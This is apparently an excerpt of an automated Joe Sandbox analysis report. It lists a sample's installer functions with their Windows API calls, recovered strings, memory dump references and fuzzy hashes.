                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                    • MulDiv.KERNEL32(00016600,00000064,?), ref: 00403295
                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                    Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                    • wsprintfW.USER32 ref: 00404457
                                                                                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s$@rD
                                                                                                                                    • API String ID: 3540041739-1813061909
                                                                                                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                    Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    Strings
                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                    Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID: $@rD
                                                                                                                                    • API String ID: 3748168415-881980237
                                                                                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                    Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                    Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1599320355-0
